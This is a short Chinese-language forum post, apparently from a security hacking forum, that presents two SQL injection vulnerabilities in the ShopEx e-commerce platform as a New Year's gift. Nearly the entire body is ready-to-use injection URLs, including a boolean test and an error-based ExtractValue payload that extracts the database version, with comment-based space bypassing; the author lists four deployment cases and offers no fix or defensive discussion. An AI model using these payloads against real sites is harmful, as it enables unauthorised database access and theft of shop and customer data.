T00ls新年礼物之二:shopex通杀SQL注入两处

2013-02-03 15:51:46 90 6919 9
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html

http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html


分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.

关于作者

伟大娃娃27篇文章238篇回复

评论90次

要评论?请先  登录  或  注册